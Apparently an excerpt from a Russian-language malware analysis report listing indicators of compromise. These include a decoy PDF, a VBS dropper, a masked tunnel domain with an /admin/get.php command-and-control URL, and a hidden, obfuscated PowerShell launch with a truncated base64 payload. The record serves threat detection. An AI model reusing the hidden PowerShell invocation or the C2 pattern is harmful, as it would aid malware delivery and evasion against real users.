Техническая информация
- <Текущая директория>\applicationform.pdf
- <Текущая директория>\main_silencer.vbs
- 'c8#######483fa.lhrtunnel.link':80
- http://c8#######483fa.lhrtunnel.link/admin/get.php
- DNS ASK c8#######483fa.lhrtunnel.link
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "<Текущая директория>\Main_silencer.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nOpROfiLE -WiN hiDdEn -eNCODe JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAUgBlAGYAPQBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AY...' (со скрытым окном)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "<Текущая директория>\ApplicationForm.pdf"